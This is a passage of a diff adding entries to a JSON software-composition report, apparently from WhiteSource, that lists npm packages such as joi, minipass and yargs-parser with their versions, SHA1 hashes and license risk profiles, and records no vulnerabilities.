"05303ab1279a9093ead1a3837b3ee231f3006544", + "name": "cli-source-preview-1.1.0.tgz", + "artifactId": "cli-source-preview-1.1.0.tgz", + "version": "1.1.0", + "groupId": "cli-source-preview", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7c391b40-660d-48bf-8ebd-6df94d5499d9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3de69dcf-e7a9-4f08-9af0-9a590afffe0d", + "keyId": 27088623, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/merge-options/-/merge-options-1.0.1.tgz", + "homePage": "https://github.com/schnittstabil/merge-options#readme", + "genericPackageIndex": "https://www.npmjs.org/package/merge-options" + }, + "matchType": "SHA1", + "sha1": "2a64b24457becd4e4dc608283247e94ce589aa32", + "name": "merge-options-1.0.1.tgz", + "artifactId": "merge-options-1.0.1.tgz", + "version": "1.0.1", + "groupId": "merge-options", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ff948aa5-be13-4ca8-845e-7f3841996ef2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5d3488ef-041a-40fc-926f-94c7c2476935", + "keyId": 26973805, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/string.fromcodepoint/-/string.fromcodepoint-0.2.1.tgz", + "homePage": "http://mths.be/fromcodepoint", + "genericPackageIndex": "https://www.npmjs.org/package/string.fromcodepoint" + }, + "matchType": "SHA1", + "sha1": "8d978333c0bc92538f50f383e4888f3e5619d653", + "name": "string.fromcodepoint-0.2.1.tgz", + "artifactId": "string.fromcodepoint-0.2.1.tgz", + "version": "0.2.1", + "groupId": "string.fromcodepoint", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "http://mths.be/mit" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "becaf824-bf67-4156-88c8-9af4ba39dc2f", + "keyId": 26955082, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/symbol-observable/-/symbol-observable-1.0.1.tgz", + "homePage": "https://github.com/blesh/symbol-observable#readme", + "genericPackageIndex": "https://www.npmjs.org/package/symbol-observable" + }, + "matchType": "SHA1", + "sha1": "8340fc4702c3122df5d22288f88283f513d3fdd4", + "name": "symbol-observable-1.0.1.tgz", + "artifactId": "symbol-observable-1.0.1.tgz", + "version": "1.0.1", + "groupId": "symbol-observable", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ccf0b74d-7bfe-454f-85ff-14c4736301d6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dddb9f02-4033-4fb5-9c62-81950d2f217c", + "keyId": 27100328, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-color-functional-notation/-/postcss-color-functional-notation-2.0.1.tgz", + "homePage": "https://github.com/jonathantneal/postcss-color-functional-notation#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-color-functional-notation" + }, + "matchType": "SHA1", + "sha1": "5efd37a88fbabeb00a2966d1e53d98ced93f74e0", + "name": "postcss-color-functional-notation-2.0.1.tgz", + "artifactId": "postcss-color-functional-notation-2.0.1.tgz", + "version": "2.0.1", + "groupId": "postcss-color-functional-notation", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/fdbc39ef-7b28-4dd0-9945-f75c54b3cccc" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f87bf4df-a74a-4f0d-99a9-8b58c115da04", + "keyId": 26965294, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/util/-/util-0.10.4.tgz", + "homePage": "https://github.com/defunctzombie/node-util", + "genericPackageIndex": "https://www.npmjs.org/package/util" + }, + "matchType": "SHA1", + "sha1": "3aa0125bfe668a4672de58857d3ace27ecb76901", + "name": "util-0.10.4.tgz", + "artifactId": "util-0.10.4.tgz", + "version": "0.10.4", + "groupId": "util", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4e578b5b-80e5-43a9-8196-a634133596b2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cac083c8-20a0-421a-9297-5fc3dc683788", + "keyId": 28432169, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fast-sass-loader/-/fast-sass-loader-1.5.0.tgz", + "homePage": "https://github.com/yibn2008/fast-sass-loader#readme", + "genericPackageIndex": "https://www.npmjs.org/package/fast-sass-loader" + }, + "matchType": "SHA1", + "sha1": "b3bcf91aaa5fd042e01c536bb338db74b03fef0c", + "name": "fast-sass-loader-1.5.0.tgz", + "artifactId": "fast-sass-loader-1.5.0.tgz", + "version": "1.5.0", + "groupId": "fast-sass-loader", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/fast-sass-loader" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6b3b98fb-df7e-41d9-9378-391875ca0fd8", + "keyId": 27049164, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/map-age-cleaner/-/map-age-cleaner-0.1.3.tgz", + "homePage": "https://github.com/SamVerschueren/map-age-cleaner#readme", + "genericPackageIndex": "https://www.npmjs.org/package/map-age-cleaner" + }, + "matchType": "SHA1", + "sha1": "7d583a7306434c055fe474b0f45078e6e1b4b92a", + "name": "map-age-cleaner-0.1.3.tgz", + "artifactId": "map-age-cleaner-0.1.3.tgz", + "version": "0.1.3", + "groupId": "map-age-cleaner", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/map-age-cleaner/v/0.1.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "aa62b44c-a6a0-4676-94bb-f04f3be44cf7", + "keyId": 28432143, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/r-json/-/r-json-1.2.9.tgz", + "homePage": "https://github.com/IonicaBizau/node-r-json", + "genericPackageIndex": "https://www.npmjs.org/package/r-json" + }, + "matchType": "SHA1", + "sha1": "0637da3485b0b4492e9ffae85796f8b2f373f600", + "name": "r-json-1.2.9.tgz", + "artifactId": "r-json-1.2.9.tgz", + "version": "1.2.9", + "groupId": "r-json", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/r-json/v/1.2.9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f2266d1b-471e-43cc-86ee-1bdf21806a41", + "keyId": 28432137, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@korzio/djv-draft-04/-/djv-draft-04-2.0.1.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@korzio/djv-draft-04" + }, + "matchType": "SHA1", + "sha1": "2984289426cac5ed622b26a58c3af8584aefbdfe", + "name": "djv-draft-04-2.0.1.tgz", + "artifactId": "djv-draft-04-2.0.1.tgz", + "version": "2.0.1", + "groupId": "@korzio/djv-draft-04", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/07bf1d11-5f6d-4aa9-ba61-32696385cea1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3e9aeb14-49bc-4787-a3f4-758872fbf203", + "keyId": 27083657, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/joi/-/joi-13.7.0.tgz", + "homePage": "https://github.com/hapijs/joi", + "genericPackageIndex": "https://www.npmjs.org/package/joi" + }, + "matchType": "SHA1", + "sha1": "cfd85ebfe67e8a1900432400b4d03bbd93fb879f", + "name": "joi-13.7.0.tgz", + "artifactId": "joi-13.7.0.tgz", + "version": "13.7.0", + "groupId": "joi", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/joi" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "09b0a143-3efc-4829-8208-0493086a9deb", + "keyId": 27815752, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/args/-/args-5.0.1.tgz", + "homePage": "https://github.com/leo/args#readme", + "genericPackageIndex": "https://www.npmjs.org/package/args" + }, + "matchType": "SHA1", + "sha1": "4bf298df90a4799a09521362c579278cc2fdd761", + "name": "args-5.0.1.tgz", + "artifactId": "args-5.0.1.tgz", + "version": "5.0.1", + "groupId": "args", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0008786d-3744-4c48-9b4d-4567e3cc2112" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5080490f-9c98-4ec3-a293-6d10bc47e553", + "keyId": 27287329, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-values-parser/-/postcss-values-parser-2.0.1.tgz", + "homePage": "https://github.com/lesshint/postcss-values-parser#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-values-parser" + }, + "matchType": "SHA1", + "sha1": "da8b472d901da1e205b47bdc98637b9e9e550e5f", + "name": "postcss-values-parser-2.0.1.tgz", + "artifactId": "postcss-values-parser-2.0.1.tgz", + "version": "2.0.1", + "groupId": "postcss-values-parser", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-values-parser/v/2.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "698491a4-ae35-4494-89b1-ec6e8933d30c", + "keyId": 27100481, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-image-set-function/-/postcss-image-set-function-3.0.1.tgz", + "homePage": "https://github.com/jonathantneal/postcss-image-set-function#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-image-set-function" + }, + "matchType": "SHA1", + "sha1": "28920a2f29945bed4c3198d7df6496d410d3f288", + "name": "postcss-image-set-function-3.0.1.tgz", + "artifactId": "postcss-image-set-function-3.0.1.tgz", + "version": "3.0.1", + "groupId": "postcss-image-set-function", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/18e9261b-fd04-42a5-b780-f10df0cb0f46" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9d7c54c5-3c08-4fe2-a6b9-c8851fc326ce", + "keyId": 26955520, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-1.4.0.tgz", + "homePage": "https://github.com/sindresorhus/ansi-escapes#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-escapes" + }, + "matchType": "SHA1", + "sha1": "d3a8a83b319aa67793662b13e761c7911422306e", + "name": "ansi-escapes-1.4.0.tgz", + "artifactId": "ansi-escapes-1.4.0.tgz", + "version": "1.4.0", + "groupId": "ansi-escapes", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/fc28abdb-1125-4acd-8c4b-e659dafde084" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "df449b58-34c7-4ff0-ba15-4d94484dbd7f", + "keyId": 28432188, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-dropdown/-/honeyui-dropdown-1.3.0.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/dropdown#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-dropdown" + }, + "matchType": "SHA1", + "sha1": "a04e8795fae9d0fbd0f5d5ff1935addc31464d6f", + "name": "honeyui-dropdown-1.3.0.tgz", + "artifactId": "honeyui-dropdown-1.3.0.tgz", + "version": "1.3.0", + "groupId": "@test/honeyui-dropdown", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7e89ccc0-ac30-473d-a062-c930714a7cc1", + "keyId": 28432149, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/event-lite/-/event-lite-0.1.2.tgz", + "homePage": "https://github.com/kawanet/event-lite", + "genericPackageIndex": "https://www.npmjs.org/package/event-lite" + }, + "matchType": "SHA1", + "sha1": "838a3e0fdddef8cc90f128006c8e55a4e4e4c11b", + "name": "event-lite-0.1.2.tgz", + "artifactId": "event-lite-0.1.2.tgz", + "version": "0.1.2", + "groupId": "event-lite", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a11c45b6-082d-47a1-8dcb-f2d8218380c5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4158a684-e424-4a06-9370-4c91ff007480", + "keyId": 27100476, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-selector-matches/-/postcss-selector-matches-4.0.0.tgz", + "homePage": "https://github.com/postcss/postcss-selector-matches#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-selector-matches" + }, + "matchType": "SHA1", + "sha1": "71c8248f917ba2cc93037c9637ee09c64436fcff", + "name": "postcss-selector-matches-4.0.0.tgz", + "artifactId": "postcss-selector-matches-4.0.0.tgz", + "version": "4.0.0", + "groupId": "postcss-selector-matches", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-selector-matches/v/4.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b57c9e8a-ad5d-4169-a364-112466b51e80", + "keyId": 28389754, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cssnano-simple/-/cssnano-simple-1.0.0.tgz", + "homePage": "https://github.com/timer/cssnano-simple#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cssnano-simple" + }, + "matchType": "SHA1", + "sha1": "a9322f7f4c192fad29c6d48afcb7927a9c5c597b", + "name": "cssnano-simple-1.0.0.tgz", + "artifactId": "cssnano-simple-1.0.0.tgz", + "version": "1.0.0", + "groupId": "cssnano-simple", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/19dd1066-a271-4db4-bf55-0bec9dfd5346" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c5509a37-1f44-492d-a85e-684c4c0558a2", + "keyId": 27045126, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/tryer/-/tryer-1.0.1.tgz", + "homePage": "https://gitlab.com/philbooth/tryer", + "genericPackageIndex": "https://www.npmjs.org/package/tryer" + }, + "matchType": "SHA1", + "sha1": "f2c85406800b9b0f74c9f7465b81eaad241252f8", + "name": "tryer-1.0.1.tgz", + "artifactId": "tryer-1.0.1.tgz", + "version": "1.0.1", + "groupId": "tryer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2cfb8038-8077-48ac-915c-d191ea7d3abc" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "001e144d-542f-4d02-be2d-7199917dde7b", + "keyId": 26954732, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/num2fraction/-/num2fraction-1.2.2.tgz", + "homePage": "https://github.com/yisibl/num2fraction#readme", + "genericPackageIndex": "https://www.npmjs.org/package/num2fraction" + }, + "matchType": "SHA1", + "sha1": "6f682b6a027a4e9ddfa4564cd2589d1d4e669ede", + "name": "num2fraction-1.2.2.tgz", + "artifactId": "num2fraction-1.2.2.tgz", + "version": "1.2.2", + "groupId": "num2fraction", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/num2fraction" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "946aa562-5ae7-4bb2-8c66-a91ff2bd0a79", + "keyId": 28432161, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/extracted-loader/-/extracted-loader-1.0.7.tgz", + "homePage": "https://github.com/sheerun/extracted-loader", + "genericPackageIndex": "https://www.npmjs.org/package/extracted-loader" + }, + "matchType": "SHA1", + "sha1": "80ee335be54c8f45d649e3362d5ae6bb46686067", + "name": "extracted-loader-1.0.7.tgz", + "artifactId": "extracted-loader-1.0.7.tgz", + "version": "1.0.7", + "groupId": "extracted-loader", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/sheerun/extracted-loader/blob/1.0.7/README.md" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d46639f9-54f5-4976-8566-52af37916da3", + "keyId": 27499549, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cliui/-/cliui-5.0.0.tgz", + "homePage": "https://github.com/yargs/cliui#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cliui" + }, + "matchType": "SHA1", + "sha1": "deefcfdb2e800784aa34f46fa08e06851c7bbbc5", + "name": "cliui-5.0.0.tgz", + "artifactId": "cliui-5.0.0.tgz", + "version": "5.0.0", + "groupId": "cliui", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/60145fbe-cf26-4449-8698-770fa0c531e2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "60568c4a-0f20-485b-867c-c43109037dd8", + "keyId": 28250701, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/minipass/-/minipass-2.9.0.tgz", + "homePage": "https://github.com/isaacs/minipass#readme", + "genericPackageIndex": "https://www.npmjs.org/package/minipass" + }, + "matchType": "SHA1", + "sha1": "e713762e7d3e32fed803115cf93e04bca9fcc9a6", + "name": "minipass-2.9.0.tgz", + "artifactId": "minipass-2.9.0.tgz", + "version": "2.9.0", + "groupId": "minipass", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3a8970fa-646e-4b8c-b630-9039c0f94d39" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "deaa285c-f8d1-404c-be69-cb1f1829aecf", + "keyId": 27618808, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-13.1.1.tgz", + "homePage": "https://github.com/yargs/yargs-parser#readme", + "genericPackageIndex": "https://www.npmjs.org/package/yargs-parser" + }, + "matchType": "SHA1", + "sha1": "d26058532aa06d365fe091f6a1fc06b2f7e5eca0", + "name": "yargs-parser-13.1.1.tgz", + "artifactId": "yargs-parser-13.1.1.tgz", + "version": "13.1.1", + "groupId": "yargs-parser", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5f28b08b-0586-4eb6-841d-2338d0c22a7e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c3de0538-0ba0-4448-82c9-55eb922df200", + "keyId": 27100401, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-page-break/-/postcss-page-break-2.0.0.tgz", + "homePage": "https://github.com/shrpne/postcss-page-break", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-page-break" + }, + "matchType": "SHA1", + "sha1": "add52d0e0a528cabe6afee8b46e2abb277df46bf", + "name": "postcss-page-break-2.0.0.tgz", + "artifactId": "postcss-page-break-2.0.0.tgz", + "version": "2.0.0", + "groupId": "postcss-page-break", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a5a8f62b-fad3-4c14-a2e5-58b74c3bb2ef" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3c2e7607-b950-42f5-a729-d68180d48ef4", + "keyId": 27653879, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/default-shell/-/default-shell-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/default-shell#readme", + "genericPackageIndex": "https://www.npmjs.org/package/default-shell" + }, + "matchType": "SHA1", + "sha1": "752304bddc6174f49eb29cb988feea0b8813c8bc", + "name": "default-shell-1.0.1.tgz", + "artifactId": "default-shell-1.0.1.tgz", + "version": "1.0.1", + "groupId": "default-shell", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/default-shell" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3b0e5fee-ed3e-405c-ad7f-065ad0575ce8", + "keyId": 27287305, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz", + "homePage": "https://github.com/yargs/require-main-filename#readme", + "genericPackageIndex": "https://www.npmjs.org/package/require-main-filename" + }, + "matchType": "SHA1", + "sha1": "d0b329ecc7cc0f61649f62215be69af54aa8989b", + "name": "require-main-filename-2.0.0.tgz", + "artifactId": "require-main-filename-2.0.0.tgz", + "version": "2.0.0", + "groupId": "require-main-filename", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/require-main-filename/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0cc4584a-98ec-4477-a217-511b14111112", + "keyId": 28432200, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-modal/-/honeyui-modal-1.2.0.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/modal#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-modal" + }, + "matchType": "SHA1", + "sha1": "e2d451cd804d6781db8ca568dac000dc0db01eeb", + "name": "honeyui-modal-1.2.0.tgz", + "artifactId": "honeyui-modal-1.2.0.tgz", + "version": "1.2.0", + "groupId": "@test/honeyui-modal", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ff70408f-e57c-4dc9-a185-f42d122f8ee9", + "keyId": 26966974, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lcid/-/lcid-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/lcid#readme", + "genericPackageIndex": "https://www.npmjs.org/package/lcid" + }, + "matchType": "SHA1", + "sha1": "6ef5d2df60e52f82eb228a4c373e8d1f397253cf", + "name": 